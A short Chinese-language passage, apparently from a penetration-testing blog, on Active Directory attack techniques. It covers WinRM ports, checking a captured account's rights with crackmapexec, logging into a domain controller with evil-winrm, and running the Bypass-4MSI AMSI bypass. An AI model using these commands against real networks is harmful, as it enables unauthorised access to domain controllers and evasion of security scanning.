域渗透域渗透:常见技巧域环境测试中常见操作与技巧的简要记录。1. WSMan/WinRMWinRM默认使用5985(HTTP)和5986(HTTPS)如果域控开了该服务 当我们获得一个账号的时候1 2 3 4 5 6 # 使用crackmapexec检查权限 crackmapexec winrm <DC_IP> -u svc-account -p password --shares # 尝试WinRM evil-winrm -i <DC_IP> -u svc-account -p password Bypass-4MSI 切换cmd